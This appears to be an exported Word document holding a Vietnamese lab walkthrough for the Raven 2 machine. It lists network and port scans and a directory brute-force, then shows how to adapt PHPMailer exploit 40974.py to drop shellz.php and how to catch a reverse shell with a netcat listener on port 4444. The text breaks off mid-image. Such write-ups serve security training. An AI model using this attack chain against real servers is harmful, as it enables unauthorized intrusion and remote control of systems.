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4D93" w14:textId="65ECC586" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">RAVEN </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> ENUMERATION AND EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CDBB98" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Giai đoạn: Dò quét Mạng và Dịch vụ (Network &amp; Service Discovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA2A317" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục đích: Dò tìm IP mục tiêu trong mạng nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53578045" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Lệnh thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE0CBE1" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>netdiscover -i eth1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FA5765" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Giải thích: Sử dụng công cụ netdiscover quét giao thức kết nối mạng (ARP) trên cổng mạng eth1 để tìm và xác định địa chỉ IP của máy ảo Raven trong cùng mạng LAN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4EB935" w14:textId="39413E99" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="170B5020" wp14:editId="1056964A">
            <wp:extent cx="5943600" cy="2052320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="16700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0603" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2052320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục đích: Rà quét cổng và phát hiện lỗ hổng dịch vụ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2023D0D1" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Lệnh thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E9BFF" w14:textId="4EBDD0F5" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p- -A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>192.168.56.106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608356B5" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Giải thích: Sử dụng công cụ Nmap quét toàn bộ 65535 cổng (-p-) kết hợp quét sâu, chủ động (-A) để phát hiện hệ điều hành, phiên bản dịch vụ đang chạy và các lỗ hổng mặc định có thể khai thác trên máy ảo mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F3074" w14:textId="2456014C" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00355F9B" w:rsidP="00D72ED2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="127C9641" wp14:editId="1558186D">
            <wp:extent cx="5943600" cy="4732655"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40038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85921" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4732655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D72ED2" w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục đích: Dò quét cấu trúc thư mục và tệp tin trên máy chủ Web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4302C142" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Lệnh thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBCE920" w14:textId="7808853E" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>dirb http://192.168.56.10</w:t>
      </w:r>
      <w:r w:rsidR="00355F9B">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79485CE5" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Giải thích: Sử dụng Dirb để brute-force cấu trúc thư mục của trang web mục tiêu, nhằm phát hiện ra các trang quản trị, thư mục ẩn hoặc tệp tin nhạy cảm bị rò rỉ trên Web Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3646FFFB" w14:textId="77777777" w:rsidR="00355F9B" w:rsidRDefault="00355F9B" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31332938" wp14:editId="4C81588C">
            <wp:extent cx="5943600" cy="5404485"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="649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8936" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="5404485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F75665" w14:textId="01ABEFB5" w:rsidR="00355F9B" w:rsidRDefault="00355F9B" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C179872" wp14:editId="580EB65E">
            <wp:extent cx="5943600" cy="4126230"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1745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6554" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4126230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F62FD6F" w14:textId="5180C0A5" w:rsidR="00355F9B" w:rsidRDefault="00355F9B" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="536B5940" wp14:editId="584BC7E3">
            <wp:extent cx="5372100" cy="1276350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="135516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9560" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5372100" cy="1276350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="650A9AB5" w14:textId="79D0255E" w:rsidR="00355F9B" w:rsidRDefault="00355F9B" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="413687F3" wp14:editId="640A5868">
            <wp:extent cx="5486400" cy="1590675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="54246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66220" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1590675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3995E2E3" w14:textId="487C4E00" w:rsidR="00355F9B" w:rsidRDefault="00355F9B" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63C930A9" wp14:editId="45FF1EB9">
            <wp:extent cx="5943600" cy="5369560"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="87994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40150" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="5369560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30182744" w14:textId="302ED713" w:rsidR="00355F9B" w:rsidRDefault="00355F9B" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00AD443C">
        <w:t>Dựa vào phiên bản hệ điều hành</w:t>
      </w:r>
      <w:r w:rsidR="00AD443C" w:rsidRPr="00AD443C">
        <w:t xml:space="preserve"> và thông tin mà chúng ta thu thập được.Tôi sẽ lên gg tra </w:t>
      </w:r>
      <w:r w:rsidR="00AD443C">
        <w:t xml:space="preserve"> lỗ hổng bỏ mật liên quan đến PHP Mailer 5.2.16 và download nó về và đặt tên là 40974.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1297B411" w14:textId="3FC7A063" w:rsidR="00AD443C" w:rsidRPr="00AD443C" w:rsidRDefault="00AD443C" w:rsidP="00D72ED2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6860D340" wp14:editId="65951D8F">
            <wp:extent cx="3714750" cy="1152525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6229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92" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3714750" cy="1152525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4803A069" w14:textId="192EDFA8" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Giai đoạn: Khai thác lỗ hổng và Chiếm quyền truy cập ban đầu (Exploitation &amp; Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2DB9CE" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục đích: Cấu hình mã khai thác và cài đặt thư viện phụ thuộc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3DEF9F" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:lastRenderedPageBreak/>
        <w:t>Lệnh thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E9429" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A26A3DE" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t># Thêm dòng sau vào đầu script Python:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07692D41" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00FB50E7" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB50E7">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t># coding: utf-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F9D387" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2"/>
    <w:p w14:paraId="5334D5BB" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t># Sửa lại đường dẫn mục tiêu trong script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF85228" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00FB50E7" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB50E7">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Change target: /var/www/html/shellz.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D749F99" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2"/>
    <w:p w14:paraId="0E1B8CF9" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t># Cài đặt thư viện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FBDE82" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00FB50E7" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB50E7">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>pip3 install requests_toolbelt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469407F4" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Giải thích: Sửa đổi mã nguồn khai thác (khai báo chuẩn mã hóa UTF-8 và trỏ đến tệp đích shellz.php trên server). Đồng thời, cài đặt thư viện requests_toolbelt qua pip3 để hỗ trợ script Python gửi các HTTP request phức tạp khi thực thi payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E359BF1" w14:textId="77777777" w:rsidR="00022668" w:rsidRDefault="00022668" w:rsidP="00D72ED2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76985164" wp14:editId="37297E4F">
            <wp:extent cx="5943600" cy="3336925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="101573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9873" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3336925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BB8C4C" w14:textId="3DF884A7" w:rsidR="00EC7ACC" w:rsidRPr="00EC7ACC" w:rsidRDefault="00EC7ACC" w:rsidP="00EC7ACC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7ACC">
        <w:t xml:space="preserve">Sau khi đã chỉnh sửa thanhfcoong chạy lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7ACC">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>python3 40974.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606CCD85" w14:textId="017FB133" w:rsidR="00EC7ACC" w:rsidRDefault="00EC7ACC" w:rsidP="00D72ED2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ABD9618" wp14:editId="61359AFC">
            <wp:extent cx="5943600" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="207844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44794" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2057400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3B5323" w14:textId="77777777" w:rsidR="00EC7ACC" w:rsidRDefault="00EC7ACC" w:rsidP="00D72ED2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62973380" w14:textId="77777777" w:rsidR="00EC7ACC" w:rsidRDefault="00022668" w:rsidP="00D72ED2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4175505F" wp14:editId="5ECED69A">
            <wp:extent cx="5943600" cy="1325245"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="127163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5738" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1325245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="679302B1" w14:textId="77777777" w:rsidR="00EC7ACC" w:rsidRDefault="00EC7ACC" w:rsidP="00D72ED2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E8E52DE" w14:textId="2708D64C" w:rsidR="00EC7ACC" w:rsidRDefault="00EC7ACC" w:rsidP="00D72ED2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5E5F6A" w14:textId="4125CF87" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục đích: Lắng nghe và bắt kết nối dội ngược (Reverse Shell).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457F4DCF" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Lệnh thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8D20B" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00FB50E7" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB50E7">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>nc -nlvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFED3A6" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Giải thích: Sử dụng công cụ Netcat mở cổng 4444 trên máy của người tấn công để vào trạng thái chờ, chuẩn bị bắt kết nối Reverse Shell từ máy mục tiêu trả về sau khi mã khai thác được chạy thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCD6308" w14:textId="66A1AA9C" w:rsidR="00EC7ACC" w:rsidRPr="00D72ED2" w:rsidRDefault="00EC7ACC" w:rsidP="00D72ED2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="631B0427" wp14:editId="358ED58D">
            <wp:extent cx="5943600" cy="2199005"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="96149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98625" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
